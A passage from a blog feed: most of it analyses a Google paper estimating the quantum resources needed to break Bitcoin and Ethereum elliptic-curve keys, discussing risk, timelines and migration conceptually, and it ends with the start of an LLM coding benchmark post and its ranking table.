<p><strong>First: the cost collapsed.</strong> The Google team presents new circuits for solving the <a href="https://en.bitcoin.it/wiki/Secp256k1"target="_blank" rel="noopener">secp256k1</a> curve (the curve behind Bitcoin and Ethereum accounts) using far fewer resources than anyone thought. Two recipes: one with under 1,200 logical qubits and 90 million Toffoli gates, another with under 1,450 logical qubits and 70 million gates.</p>
<p>On superconducting hardware, with standard error-correction assumptions, that would fit in <strong>under 500,000 physical qubits</strong> — nearly 20 times fewer than prior estimates — and run in <strong>9 to 12 minutes</strong> from a precomputed state. Hold onto that number: 9 minutes. It&rsquo;s the scary one, because it&rsquo;s shorter than Bitcoin&rsquo;s average block interval.</p>
<p><strong>Second: they didn&rsquo;t publish the circuit.</strong> Here&rsquo;s a move that&rsquo;s elegant and controversial at once. To prove they have a circuit that size without handing everyone a loaded gun, they published a <strong><a href="https://en.wikipedia.org/wiki/Zero-knowledge_proof"target="_blank" rel="noopener">zero-knowledge proof</a></strong>: a mathematical proof that they possess the circuit, without revealing the circuit. Responsible in intent. Except, as I&rsquo;ll get to, this part was the shakiest piece of the whole story.</p>
<p>If &ldquo;zero-knowledge proof&rdquo; sounds esoteric, the idea is simple and old in cryptography: prove you know or have something without revealing the thing itself. You can prove you&rsquo;re of legal age without showing your birthdate, or that you know a password without typing it.</p>
<p>It&rsquo;s the same trick behind the privacy of several cryptocurrencies: Zcash uses ZK (the so-called zk-SNARKs) to validate shielded transactions without exposing amount or address, Monero uses range proofs (bulletproofs) to hide how much was sent, and Ethereum&rsquo;s zk-rollups use ZK to prove a batch of transactions is valid without reprocessing all of it. In the paper, Google uses the same family of tool to prove it possesses the circuit, without handing over the circuit.</p>
<p><strong>Third: not every quantum computer is good for everything.</strong> The paper draws a distinction that&rsquo;s the text&rsquo;s best practical contribution. There&rsquo;s the &ldquo;fast clock&rdquo; (superconducting, photonic) and the &ldquo;slow clock&rdquo; (trapped ions, neutral atoms), with a 100x to 1,000x speed difference. Out of that speed come three types of attack:</p>
<ul>
<li><strong>On-spend attack:</strong> the attacker intercepts your transaction in the mempool, breaks the key, and injects a rival transaction before your spend lands in a block. Needs a fast clock, because it&rsquo;s a race against the block clock.</li>
<li><strong>At-rest attack:</strong> the public key is already exposed on the blockchain (a dormant wallet, a reused key). The attacker has days or months to work. Even a slow clock does the job.</li>
<li><strong>On-setup attack:</strong> a single quantum computation extracts a secret from a cryptographic ceremony and becomes a reusable master key, which then runs on ordinary classical computers. This one&rsquo;s the most insidious, and it hits things like Ethereum&rsquo;s data-availability mechanism.</li>
</ul>
<p><strong>Fourth: the map of who bleeds.</strong> On Bitcoin, the at-rest targets are the old <a href="https://en.bitcoin.it/wiki/Script"target="_blank" rel="noopener">P2PK</a> scripts (about 1.7 million BTC, almost all Satoshi-era and probably lost), <a href="https://bitcoinops.org/en/topics/taproot/"target="_blank" rel="noopener">Taproot</a> (P2TR, which exposes the key), and any reused address.</p>
<p>All told, the paper estimates around 6.9 million BTC vulnerable today, of which some 2.3 million have been dormant for more than five years. Modern addresses that hide the key behind a hash and have never spent stay safe at rest.</p>
<p>And there&rsquo;s good news buried here: <strong>Bitcoin mining is not at risk</strong>. <a href="https://en.wikipedia.org/wiki/Grover%27s_algorithm"target="_blank" rel="noopener">Grover&rsquo;s algorithm</a>, which would attack mining, has too small a gain and doesn&rsquo;t parallelize; error-correction overhead eats it all. The paper buries that myth on purpose.</p>
<blockquote>
  <p><strong>Bitcoin mining is not at risk. Quantum toppling Proof-of-Work is the myth this paper buries on purpose.</strong></p>

</blockquote>
<p><strong>Fifth: Ethereum has a much larger surface.</strong> The account model exposes the public key permanently after the first transaction, unlike Bitcoin&rsquo;s UTXO model. Add to that contract admin keys (stablecoins, bridges, oracles), the <a href="https://en.wikipedia.org/wiki/BLS_digital_signature"target="_blank" rel="noopener">BLS signatures</a> holding up <a href="https://en.wikipedia.org/wiki/Proof_of_stake"target="_blank" rel="noopener">Proof-of-Stake</a> consensus, and the <a href="https://dankradfeist.de/ethereum/2020/06/16/kate-polynomial-commitments.html"target="_blank" rel="noopener">KZG commitments</a> in the data layer. More stuff exposed, and much of it you can&rsquo;t &ldquo;change addresses&rdquo; to escape.</p>
<p>And how does the paper argue all this? Three legs: the resource estimates (with the zero-knowledge proof for credibility), real blockchain data (the BTC and ETH at-risk figures come from public <a href="https://en.wikipedia.org/wiki/BigQuery"target="_blank" rel="noopener">BigQuery</a> queries), and the honest framing that the goal is to sound the alarm to migrate, making clear the machine is still to come.</p>
<p>The paper, by the way, <strong>gives no date</strong>. It sizes the machine and stops there; the calendar stays open.</p>
<h2>Where I agree and disagree with the other models<span class="hx:absolute hx:-mt-20" id="where-i-agree-and-disagree-with-the-other-models"></span>
    <a href="#where-i-agree-and-disagree-with-the-other-models" class="subheading-anchor" aria-label="Permalink for this section"></a></h2><p>I asked GLM 5.3, Kimi K3, and ChatGPT (GPT 5.6) to analyze and criticize the paper. The interesting part is that all three, and I, converge on the essentials and diverge on exactly the same points. That&rsquo;s a good sign: when different models hammer the same nail, the nail usually exists.</p>
<p><strong>What everyone agrees on (me included):</strong></p>
<ul>
<li>The logical-resource estimate is <strong>credible</strong>. It&rsquo;s not a number out of nowhere: it follows the historical trajectory (the cost to break RSA-2048 fell from ~1 billion qubits in 2012 to under 1 million in 2025) and comes from the very group that produced the field&rsquo;s best estimates.</li>
<li>The fast-clock / slow-clock distinction and the spend / rest pairing are the right lens for thinking about mitigation.</li>
<li>The mining immunity is correct and needed saying out loud.</li>
<li>Dormant assets are a real problem no software fork solves on its own, because nobody holds the private key to move the lost coins.</li>
</ul>
<p><strong>What everyone flags (and I flag harder):</strong></p>
<p>ChatGPT was the sharpest on a distinction worth gold: <strong>there&rsquo;s a gulf between &ldquo;value at risk&rdquo; and &ldquo;expected loss&rdquo;</strong>. When the paper says &ldquo;20.5 million ETH in vulnerable accounts&rdquo; or &ldquo;6.9 million BTC exposed,&rdquo; that measures how much the system leans on fragile cryptography. It&rsquo;s a far bigger number than what an attacker could actually steal.</p>
<p>There&rsquo;s overlap, there&rsquo;s multisig, there&rsquo;s admin keys you can rotate, there are contracts with an emergency council that pauses everything. Stacking those numbers into a &ldquo;trillions at risk&rdquo; headline is dishonest to the paper itself.</p>
<blockquote>
  <p><strong>&ldquo;Value at risk&rdquo; measures how much the system leans on fragile cryptography. It&rsquo;s a far bigger number than what an attacker could actually steal.</strong></p>

</blockquote>
<p>Same goes for the famous <strong>41% chance of theft on Bitcoin</strong>. That number is only the probability that the 9-minute computation finishes before the next block shows up (a block arrives every 10 minutes on average, but with a lot of variance). It&rsquo;s not the chance of stealing your money.</p>
<p>To steal, the attacker still has to propagate the rival transaction, convince a miner to include it, win the fee race. And the paper itself assumes attacker-friendly conditions (no network congestion, instant delivery). Kimi and ChatGPT hit this one, and they&rsquo;re right.</p>
<p>The most important point, and one I think the paper leaves between the lines on purpose: <strong>the 500,000 physical qubits and the 9 minutes describe a conditional engineering scenario. On dates, the paper says nothing.</strong> It&rsquo;s a blueprint for a machine that <em>could</em> do the attack, assuming a 0.1% error rate, 1-microsecond correction cycles, low-latency decoding, enough magic-state factories, and half a million qubits running stable for minutes on end.</p>
<p>Each assumption is reasonable in isolation. The whole chain working together, at that scale, nobody has demonstrated.</p>
<p>And here&rsquo;s the most interesting part, which Kimi and ChatGPT caught and I confirmed by searching outside: <strong>the zero-knowledge proof mechanism had a bug.</strong> Trail of Bits <a href="https://blog.trailofbits.com/2026/04/17/we-beat-googles-zero-knowledge-proof-of-quantum-cryptanalysis/"target="_blank" rel="noopener">managed to forge a proof</a> by exploiting memory and logic bugs in Google&rsquo;s Rust verifier code, to the point of generating a proof that reported zero Toffoli gates for a circuit that wasn&rsquo;t even reversible.</p>
<p>Notice what that breaks and what it doesn&rsquo;t. The flaw was in the software that checks the proof, not in any demonstration that the paper&rsquo;s circuit is wrong. The proof stopped being trustworthy, and the scientific claim itself stayed standing, neither proven nor disproven. Google patched the verifier in version 2.</p>
<p>The lesson is about trust: instead of trusting Google&rsquo;s word, the proof was asking you to trust its parser, its compiler, and its simulator.</p>
<p>And that&rsquo;s exactly why the independent reproduction matters so much. In June 2026, researcher André Schrottenloher <a href="https://postquantum.com/security-pqc/google-ecdlp-circuits-reproduced-open/"target="_blank" rel="noopener">rebuilt the circuits in the open</a>, landing in the same region: about 56 million Toffoli gates, with the entire circuit published and reproducible.</p>
<p>Gidney himself acknowledged the reproduction captured the essential breakthrough, and after that others already pushed the number below a thousand logical qubits. So: the paper&rsquo;s central claim held up, but through a route that doesn&rsquo;t depend on trusting anyone&rsquo;s proof software. Open science is what closed the case.</p>
<p>One last point almost nobody raises and I think needs saying: <strong>conflict of interest.</strong> Seven authors are from Google Quantum AI, whose hardware roadmap is precisely the superconducting architecture the paper makes look like the nearest threat. And there&rsquo;s an Ethereum Foundation coauthor on a paper that ranks Ethereum as more exposed and recommends urgent migration.</p>
<p>The authors disclose long positions in crypto and no shorts, which is honest. None of this invalidates anything — the team&rsquo;s technical chops are the best in the field — but it calls for a calibrated read, with a cool head.</p>
<h2>The question that matters: what are the real odds, and when?<span class="hx:absolute hx:-mt-20" id="the-question-that-matters-what-are-the-real-odds-and-when"></span>
    <a href="#the-question-that-matters-what-are-the-real-odds-and-when" class="subheading-anchor" aria-label="Permalink for this section"></a></h2><p>Let&rsquo;s separate the theoretical from the real, which is where most of these debates turn to mush.</p>
<p><strong>In theory, the answer is yes, comfortably.</strong> If a big, stable enough machine exists, Shor&rsquo;s algorithm breaks secp256k1. On the math side it&rsquo;s already settled; what&rsquo;s left is engineering. The whole question boils down to: <em>when does that machine exist?</em></p>
<h3>Physical qubit versus logical qubit<span class="hx:absolute hx:-mt-20" id="physical-qubit-versus-logical-qubit"></span>
    <a href="#physical-qubit-versus-logical-qubit" class="subheading-anchor" aria-label="Permalink for this section"></a></h3><p>A quick aside to separate two numbers that trip almost everyone up: physical qubit and logical qubit. The physical qubit is the real hardware, and it&rsquo;s noisy; it loses its state in a blink, from interference, heat, vibration. On its own, it errs far too much for any serious computation.</p>
<p>The fix is error correction: you gang up hundreds or thousands of physical qubits, all representing <strong>one</strong> logical qubit, and use the redundancy to detect and repair errors in real time. The logical qubit is the &ldquo;real,&rdquo; stable qubit the algorithm actually sees.</p>
<p>And that&rsquo;s where the difficulty hides behind the numbers. The attack doesn&rsquo;t just ask for 1,200 logical qubits; it asks for <strong>1,200 logical qubits working together, all stable at the same time, for minutes on end</strong>, running tens of millions of operations without the correction system getting buried under errors.</p>
<p>It&rsquo;s like keeping a thousand plates spinning at once, each plate made of a thousand pieces that want to fall, for the entire length of the show. Keeping a single such plate up for an instant was the historic feat of 2024. The jump to a thousand plates, spinning for minutes, is the real chasm.</p>
<h3>Where the hardware stands today<span class="hx:absolute hx:-mt-20" id="where-the-hardware-stands-today"></span>
    <a href="#where-the-hardware-stands-today" class="subheading-anchor" aria-label="Permalink for this section"></a></h3><p><strong>In today&rsquo;s reality, we&rsquo;re far off.</strong> Google itself helps measure the distance. <a href="https://blog.google/innovation-and-ai/technology/research/google-willow-quantum-chip/"target="_blank" rel="noopener">Willow</a>, their flagship chip, demonstrated below-threshold error correction in 2024, a historic feat. But the result was <strong>a single well-corrected logical qubit</strong>, built from 101 physical ones, which outlived every one of them.</p>
<p>If the ruler is the number of logical qubits running together, the public record today is around a dozen (<a href="https://en.wikipedia.org/wiki/Quantinuum"target="_blank" rel="noopener">Quantinuum</a> reached 12). The paper asks for more than 1,200. On both rulers, quality and quantity, the distance runs to roughly a hundredfold, and each logical qubit still costs thousands of physical qubits with the stability we&rsquo;re missing.</p>
<p>In physical qubits, the largest announced system is in the low thousands; the attack wants nearly half a million. Several orders of magnitude of distance, across several dimensions at once. Nothing a fine-tuning pass fixes.</p>
<blockquote>
  <p><strong>Today&rsquo;s best hardware works with logical qubits in the dozen range. The attack needs more than a thousand. The gap is orders of magnitude.</strong></p>

</blockquote>
<p>There&rsquo;s also a bet that sidesteps this brute-force game: the topological one, from Microsoft. The idea is a hardware-protected qubit, naturally more error-resistant, which would slash the count of physical qubits per logical one. <a href="https://www.forbes.com/sites/moorinsights/2026/07/16/microsoft-doubles-down-on-topological-qubits-with-majorana-2-chip/"target="_blank" rel="noopener">Majorana 2</a>, in 2026, swapped aluminum for lead and jumped coherence from milliseconds to 20 seconds, and Microsoft pulled its fault-tolerance target from 2033 to 2029.</p>
<p>But it&rsquo;s the most disputed bet of them all. Much of the community doubts a real working topological qubit is even there; the latest paper shows only half the measurements that would prove the qubit. If it pans out, it&rsquo;s a shortcut for everyone; if not, it&rsquo;s a dead end. I broke this case down in <a href="/en/2026/07/12/quantum-news-majorana-2-and-understanding-shor/">a separate article</a>.</p>
<h3>The roadmaps and the timelines<span class="hx:absolute hx:-mt-20" id="the-roadmaps-and-the-timelines"></span>
    <a href="#the-roadmaps-and-the-timelines" class="subheading-anchor" aria-label="Permalink for this section"></a></h3><p><strong>The near future is where the real debate lives.</strong> The honest way to talk about it is with estimates, because nobody has certainty here. The most-cited reference is the <a href="https://globalriskinstitute.org/publication/quantum-threat-timeline/"target="_blank" rel="noopener">Global Risk Institute&rsquo;s Quantum Threat Timeline</a>, an annual survey of experts in the field.</p>
<p>The 2025 edition gives something like <strong>34% odds of a cryptographically relevant quantum computer by ~2030 and ~49% by ~2035</strong>, with the median opinion landing between 2029 and 2032. And those estimates are for a generic CRQC, typically framed around breaking RSA-2048.</p>
<p>On the manufacturing side, the most explicit roadmap is <a href="https://www.ibm.com/roadmaps/quantum/"target="_blank" rel="noopener">IBM&rsquo;s</a>. It projects Starling in 2029, the first large-scale fault-tolerant machine, with 200 logical qubits and 100 million operations.</p>
<p>Notice that 200 still sits below the more than 1,200 the attack asks for. The machine of the right size only shows up on the next step, Blue Jay, slated for 2033, with 2,000 logical qubits and a billion operations.</p>
<p>So even on the industry&rsquo;s own most aggressive roadmap, hardware with enough logical qubits to threaten secp256k1 arrives around 2033, with the usual caveat: quantum roadmaps slip. IBM is betting on <a href="https://errorcorrectionzoo.org/c/qldpc"target="_blank" rel="noopener">qLDPC</a> codes to get there, which cut the physical qubits behind each logical one by about 90% compared to Willow&rsquo;s surface code.</p>
<p>And China? It&rsquo;s right there at the frontier, which kills the one-horse-race framing. USTC&rsquo;s <a href="https://quantumzeitgeist.com/zuchongzhi-3-google-quantum-error-correction/"target="_blank" rel="noopener">Zuchongzhi 3.2</a> crossed the same error-correction threshold as Willow in 2025, with a distance-7 surface-code logical qubit, and it was the first team outside the US to get there.</p>
<p>But notice it&rsquo;s the same milestone: a single well-corrected logical qubit, the same hundredfold gap to 1,200. And publicly, China hasn&rsquo;t put a dated roadmap for the big machine on the table the way IBM has; the stated plan is incremental, pushing the code distance to 9 and 11. At the science frontier, it&rsquo;s a tie; on a calendar to the machine that breaks crypto, neither side has an easy date.</p>
<p>A warning about all these dates: they&rsquo;re the best case, with every published roadmap landing on time. A roadmap is a statement of intent, and quantum computing&rsquo;s track record is one of timelines slipping forward.</p>
<p>I&rsquo;ll go further, and this is my own opinion: I&rsquo;d bet on a timeline at least an order of magnitude longer than these roadmaps. Keeping thousands of logical qubits in sync, error-free, for minutes on end, is anything but a linear problem. My gut says each extra logical qubit makes the whole set exponentially harder to hold together: the difficulty of syncing multiplies with every new piece, rather than just adding up.</p>
<h3>My read, in numbers<span class="hx:absolute hx:-mt-20" id="my-read-in-numbers"></span>
    <a href="#my-read-in-numbers" class="subheading-anchor" aria-label="Permalink for this section"></a></h3><p>Mapping that onto crypto specifically, my read in round numbers, taking the roadmaps at face value (far more optimistic than my own bet just above), and always as estimate and opinion:</p>
<ul>
<li><strong>Next 2 to 3 years (through ~2029):</strong> near zero. Going from 12 to 1,200 stable logical qubits in that window isn&rsquo;t on any serious public roadmap.</li>
<li><strong>The 2030–2032 horizon:</strong> low, but not negligible. Maybe 10% to 20% that the machine exists <em>in principle</em>. The actual theft chance is lower still, because the highest-value targets (exchanges, modern wallets) will have moved by then.</li>
<li><strong>Around 2035:</strong> here it becomes a coin flip for a generic CRQC, in the 40% to 50% range per the experts. Except &ldquo;a CRQC exists&rdquo; isn&rsquo;t the same as &ldquo;they stole your money.&rdquo; By then, migration should be well underway.</li>
</ul>
<p>The detail that decides everything, and that Mosca sums up in a simple theorem: what matters is <strong>the machine&rsquo;s date minus the time your migration takes</strong>. If migrating takes years, and the machine could arrive in five to ten, you&rsquo;re already in a bind, even with low short-term odds. That&rsquo;s why &ldquo;start now&rdquo; makes sense even with clear skies. Asymmetric risk management, with a cool head.</p>
<h2>Why this isn&rsquo;t &ldquo;it&rsquo;s over, everything&rsquo;s lost&rdquo;<span class="hx:absolute hx:-mt-20" id="why-this-isnt-its-over-everythings-lost"></span>
    <a href="#why-this-isnt-its-over-everythings-lost" class="subheading-anchor" aria-label="Permalink for this section"></a></h2><p>Even in the scenario of a ready machine and a bad actor, the damage is surgical, hitting specific targets instead of wiping everything. And the reason is simple to grasp.</p>
<p>Your crypto doesn&rsquo;t live on your hard drive or your Ledger. It lives on the public blockchain, in plain sight, all the time. The device only holds the private key that authorizes moving it. Anyone can hit a block explorer, type an address, and see the balance. What decides your quantum exposure is one thing only: <strong>has your public key shown up somewhere?</strong></p>
<p>On modern Bitcoin addresses (the <code>bc1q</code> ones, which hide the key behind a hash), as long as you&rsquo;ve <strong>never spent</strong> from that address, the public key isn&rsquo;t exposed. The quantum attacker has nowhere to start, because it breaks the public key, and the key isn&rsquo;t there. Those funds are safe at rest.</p>
<p>Exposure is only born the moment you spend, and even then it&rsquo;s a window of minutes, against a block clock, needing that fast-clock machine that doesn&rsquo;t exist yet.</p>
<p>Watch the word, though: &ldquo;quantum-resistant&rdquo; is too big for these addresses. What they give you is at-rest protection, good only while the key stays hidden behind the hash. The day you spend, the public key hits the block and opens the on-spend window. The permanent shield only comes with migrating to a post-quantum signature; the hash just buys time until then.</p>
<p>That&rsquo;s why the paper talks about roughly 6.9 million vulnerable BTC, out of the nearly 20 million that exist. The biggest slice of that is reused keys and Satoshi-era P2PK, which are probably lost anyway.</p>
<p>It concentrates in a subset of addresses with one specific behavior, an exposed key, while the rest of the network stays out of it. Anyone using a fresh address per receipt and not spending from the same place over and over is, in practice, off the at-rest radar.</p>
<blockquote>
  <p><strong>The vulnerable crypto is a subset of addresses with one specific behavior: an already-exposed key. A fresh, no-reuse wallet stays out of it.</strong></p>

</blockquote>
<h2>What you can do today<span class="hx:absolute hx:-mt-20" id="what-you-can-do-today"></span>
    <a href="#what-you-can-do-today" class="subheading-anchor" aria-label="Permalink for this section"></a></h2><p>Here comes the question that always shows up, and the answer that disappoints anyone hoping for a magic button.</p>
<p><strong>&ldquo;If I create a wallet with a stronger password/passphrase, does that help?&rdquo;</strong> No. And understanding why teaches the whole problem.</p>
<p>A strong passphrase protects your <em>seed</em> — those 12 or 24 words — against someone trying to guess or steal the backup. That&rsquo;s great and you should do it, but it&rsquo;s a defense against a classical attack.</p>
<p>And don&rsquo;t mix up the problems: a badly generated seed is a separate failure, from the classical world. That&rsquo;s what happened with <a href="/en/2026/08/01/exploiting-coinkites-rng-egregious-problem/">Coinkite&rsquo;s weak RNG</a>, where the ColdCard itself spat out predictable keys from bad entropy at the source. There the defect is in how the key is born; quantum attacks the math of the already-finished key.</p>
<p>The quantum computer doesn&rsquo;t guess your seed. It takes your <strong>public</strong> key, sitting in plain sight on the blockchain, and computes the matching private key with Shor. It doesn&rsquo;t matter whether your private key came from a 4-character passphrase or a 40-character one: once the public key has shown up, password strength is irrelevant. Quantum attacks the curve&rsquo;s math, and that math is the same for everyone.</p>
<blockquote>
  <p><strong>Quantum doesn&rsquo;t guess your seed. It computes your private key from the public key already in plain sight. Password strength doesn&rsquo;t enter into it.</strong></p>

</blockquote>
<p>What actually moves the needle is key-exposure hygiene:</p>
<ul>
<li><strong>Don&rsquo;t reuse addresses.</strong> One address per receipt. The moment you spend from an address, its public key goes to the blockchain; if you keep using that address, the remaining balance becomes exposed at rest.</li>
<li><strong>Keep the bulk in modern addresses that hide the key behind a hash</strong> (<code>bc1q</code>, P2WPKH) and that you&rsquo;ve never spent from. Avoid parking reserves in Taproot (<code>bc1p</code>) and in old P2PK addresses, which expose the key directly.</li>
<li><strong>Don&rsquo;t spread your extended public key (xpub) around.</strong> Portfolio tools, a shared spreadsheet, a third-party integration: every place that gets your xpub is one more exposure point.</li>
<li><strong>When real post-quantum wallets show up, migrate.</strong> That&rsquo;s the definitive step, and it&rsquo;ll arrive via a software update.</li>
</ul>
<p>And the most important thing to keep your head straight: if you store on a serious exchange or use a modern wallet without reuse, your short-term risk is practically zero. The exchange is the one that&rsquo;ll have to migrate for you (with the custody risks that already exist, quantum or not). No need to run around today moving anything in a panic.</p>
<h2>What the industry can do, without going radical<span class="hx:absolute hx:-mt-20" id="what-the-industry-can-do-without-going-radical"></span>
    <a href="#what-the-industry-can-do-without-going-radical" class="subheading-anchor" aria-label="Permalink for this section"></a></h2><p>On the protocol-builder side, the temptation is the extreme: &ldquo;drop everything and switch to post-quantum signatures tomorrow.&rdquo; That&rsquo;s as bad as &ldquo;ignore it, it&rsquo;s FUD.&rdquo; Post-quantum cryptography is newer, less battle-tested, has much larger keys and signatures, and swapping blind introduces new bugs where there were none. The sensible path is defense in depth, starting with what&rsquo;s cheap.</p>
<p><strong>Intermediate measures, easier than the full swap:</strong></p>
<ul>
<li>Kill key reuse and minimize public-key exposure in the protocol and wallets by default.</li>
<li>Private mempools and commit-reveal schemes, which close the on-spend attack window.</li>
<li>Validator key rotation on Ethereum, a simple stopgap against the consensus attack.</li>
<li>On Bitcoin, proposals like BIP-360 (the P2MR script), which removes Taproot&rsquo;s at-rest key exposure.</li>
</ul>
<p><strong>The medium-term bridge:</strong> hybrid signatures, which combine today&rsquo;s elliptic curve with a post-quantum scheme (lattice-based, for instance). You stay protected against both worlds at the cost of larger signatures, and you don&rsquo;t bet everything on a new scheme that might have an undiscovered weakness.</p>
<p><strong>The ground is more mature than it looks.</strong> NIST has already standardized post-quantum schemes (ML-DSA, the former Dilithium; Falcon; SPHINCS+). Ethereum is discussing post-quantum precompiles (EIP-7932) and account abstraction, which shrink the surface without a traumatic hard fork. Blockchains like Algorand, XRP Ledger, and QRL already experiment with PQC or were born with it. The rail for this migration is already laid, far from a leap in the dark.</p>
<p><strong>And the piece nobody has solved:</strong> dormant assets. The lost P2PK coins, including the ~1 million BTC attributed to Satoshi, have no owner to migrate them.</p>
<p>The paper discusses options — do nothing, burn the coins via soft fork, a &ldquo;recovery sidechain,&rdquo; or even government-regulated salvage, on the sunken-treasure analogy.</p>
<p>Here I&rsquo;ll be blunt: <strong>this part is the paper&rsquo;s weakest. It&rsquo;s political opinion dressed up as a technical conclusion.</strong> Nothing in the qubit estimate says who should keep a lost coin, or whether sitting still for five years extinguishes a property right.</p>
<p>These are thorny legal and political choices the paper raises honestly but is nowhere near closing. Good that the conversation starts; bad to treat it as if there&rsquo;s a ready answer.</p>
<blockquote>
  <p><strong>The policy section on lost coins is the paper&rsquo;s weakest: there the science stops and the opinion begins.</strong></p>

</blockquote>
<h2>Where we actually stand<span class="hx:absolute hx:-mt-20" id="where-we-actually-stand"></span>
    <a href="#where-we-actually-stand" class="subheading-anchor" aria-label="Permalink for this section"></a></h2><p>Summing up the near-future quantum picture in a few layers, ruler always calibrated:</p>
<table>
  <thead>
      <tr>
          <th>Layer</th>
          <th>Situation</th>
          <th>Read</th>
      </tr>
  </thead>
  <tbody>
      <tr>
          <td><strong>Theoretical</strong></td>
          <td>Shor breaks secp256k1 if the machine exists</td>
          <td>Mathematical certainty; the question is when the machine exists</td>
      </tr>
      <tr>
          <td><strong>Reality today (2026)</strong></td>
          <td>~12 logical qubits (Quantinuum); attack needs &gt;1,200</td>
          <td>A factor of ~100 in logical qubits, several orders of magnitude in physical. Nobody steals anything today</td>
      </tr>
      <tr>
          <td><strong>Next 2–3 years (~2029)</strong></td>
          <td>Off any serious public roadmap</td>
          <td>Risk near zero</td>
      </tr>
      <tr>
          <td><strong>2030–2032</strong></td>
          <td>A machine capable <em>in principle</em> starts to be plausible</td>
          <td>Estimate of ~10–20%; actual theft lower still, targets migrate first</td>
      </tr>
      <tr>
          <td><strong>~2035</strong></td>
          <td>Coin flip for a generic CRQC (experts: ~40–50%)</td>
          <td>&ldquo;A machine exists&rdquo; ≠ &ldquo;they robbed you&rdquo;; migration should be underway</td>
      </tr>
  </tbody>
</table>
<p>The paper is serious and its math stands, now confirmed by open, independent reproduction. The threat is real enough to justify action, and the reason has a name: Mosca&rsquo;s theorem. Since migrating takes years, you start before the machine exists, the same way you replace a roof before the storm, while the weather&rsquo;s good.</p>
<p>But none of this is &ldquo;sell everything, Bitcoin is done.&rdquo; The attack is about exposed keys, it&rsquo;s a subset of addresses, it needs a machine that&rsquo;s orders of magnitude from existing, and the defenses that matter now are boring hygiene: don&rsquo;t reuse addresses, don&rsquo;t park reserves in an exposed key, and migrate to post-quantum when the tooling matures.</p>
<p>Mining is not at risk, your modern no-reuse wallet is not at risk today, and the strongest passphrase in the world changes none of it.</p>
<p>That&rsquo;s how to read Google&rsquo;s paper: a competent, self-aware warning, from people who know the subject, saying the window to migrate calmly is narrower than intuition suggests — and still wider than the headline makes it look. <a href="https://arxiv.org/abs/2603.28846"target="_blank" rel="noopener">Read it straight from the source</a> and draw your own conclusion. Just don&rsquo;t fall for &ldquo;it&rsquo;s over&rdquo; or &ldquo;it&rsquo;s all a lie.&rdquo; The interesting answer, as almost always, lives in the middle.</p>
]]></content:encoded><category>quantum-computing</category><category>bitcoin-and-cryptocurrency</category><category>security</category></item><item><title>LLM Benchmarks: Qwen 3.8, GLM 5.3, Gemini 3.7, Grok 4.6</title><link>https://www.akitaonrails.com/en/2026/08/15/llm-benchmarks-qwen-3-8-glm-5-3-gemini-3-7/</link><guid isPermaLink="true">https://www.akitaonrails.com/en/2026/08/15/llm-benchmarks-qwen-3-8-glm-5-3-gemini-3-7/</guid><pubDate>Sat, 15 Aug 2026 14:00:00 GMT</pubDate><description>&lt;p&gt;Two weeks ago I published &lt;a href="https://www.akitaonrails.com/en/2026/07/30/new-llm-benchmark-i-reran-every-test/"&gt;version 2 of my LLM Coding Benchmark&lt;/a&gt;: a new three-phase test — build, validate everything by actually running it, then self-review, with honesty points — each family running on the harness where it should work best. The methodology is all there, so I won&amp;rsquo;t repeat it here.&lt;/p&gt;
&lt;p&gt;The top hasn&amp;rsquo;t moved: &lt;strong&gt;Fable 5 at 96&lt;/strong&gt;, the trio of &lt;strong&gt;Sonnet 5, Opus 5, and Kimi K3 at 95&lt;/strong&gt;, and right behind them &lt;strong&gt;GPT 5.6 Sol, GPT 5.6 Terra, and Opus 4.8 at 93&lt;/strong&gt;. That&amp;rsquo;s the cream of the crop in this test. The open question: how close do the newest releases get to that group?&lt;/p&gt;</description><content:encoded><![CDATA[<p>Two weeks ago I published <a href="/en/2026/07/30/new-llm-benchmark-i-reran-every-test/">version 2 of my LLM Coding Benchmark</a>: a new three-phase test — build, validate everything by actually running it, then self-review, with honesty points — each family running on the harness where it should work best. The methodology is all there, so I won&rsquo;t repeat it here.</p>
<p>The top hasn&rsquo;t moved: <strong>Fable 5 at 96</strong>, the trio of <strong>Sonnet 5, Opus 5, and Kimi K3 at 95</strong>, and right behind them <strong>GPT 5.6 Sol, GPT 5.6 Terra, and Opus 4.8 at 93</strong>. That&rsquo;s the cream of the crop in this test. The open question: how close do the newest releases get to that group?</p>
<p>Since then I&rsquo;ve run five models: Qwen 3.8 Max, GLM 5.3, Gemini 3.7 Flash, Grok 4.6, and a 27B Qwen 3.8 running locally on my RTX 5090. One of them closed in on the leading group. Another pulled off the biggest jump this test has ever recorded. A third got caught cheating mid-test. A fourth tied its own previous generation, without moving an inch. And the local one gave me the most laborious, and most instructive, run of the year.</p>
<h2>Where they land in the ranking<span class="hx:absolute hx:-mt-20" id="where-they-land-in-the-ranking"></span>
    <a href="#where-they-land-in-the-ranking" class="subheading-anchor" aria-label="Permalink for this section"></a></h2><p>Before opening each one up, it&rsquo;s worth seeing where the newcomers fit. The table below is the <strong>Tier A.1</strong> slice of the <a href="/en/2026/07/30/new-llm-benchmark-i-reran-every-test/">v2 ranking</a>: the frontier of the test, everyone at 90 points or more. I cut it here on purpose. From A.2 down there are competent models, but the leadership race lives in this group, and that&rsquo;s what the question is about. The three cloud releases go in <strong>bold</strong>; the local 27B Qwen scored 51, Tier C, and shows up only in the table at the end.</p>
<table>
  <thead>
      <tr>
          <th style="text-align: right">#</th>
          <th>Model</th>
          <th style="text-align: right">Score</th>
          <th style="text-align: center">Tier</th>
          <th>Harness</th>
          <th style="text-align: right">Time</th>
          <th style="text-align: right">Cost</th>
      </tr>
  </thead>
  <tbody>
      <tr>
          <td style="text-align: right">1</td>
          <td>Claude Fable 5</td>
          <td style="text-align: right">96</td>
          <td style="text-align: center">A.1</td>
          <td>Claude Code</td>
          <td style="text-align: right">46 min</td>
          <td style="text-align: right">$26.03</td>
      </tr>
      <tr>
          <td style="text-align: right">2</td>
          <td>Claude Sonnet 5</td>
          <td style="text-align: right">95</td>
          <td style="text-align: center">A.1</td>
          <td>Claude Code</td>
          <td style="text-align: right">59 min</td>
          <td style="text-align: right">$25.83</td>
      </tr>
      <tr>
          <td style="text-align: right">2</td>
          <td>Claude Opus 5</td>
          <td style="text-align: right">95</td>
          <td style="text-align: center">A.1</td>
          <td>Claude Code</td>
          <td style="text-align: right">78 min</td>
          <td style="text-align: right">$38.91</td>
      </tr>
      <tr>
          <td style="text-align: right">2</td>
          <td>Kimi K3</td>
          <td style="text-align: right">95</td>
          <td style="text-align: center">A.1</td>
          <td>Kimi CLI</td>
          <td style="text-align: right">65 min</td>
          <td style="text-align: right">$6.14</td>
      </tr>
      <tr>
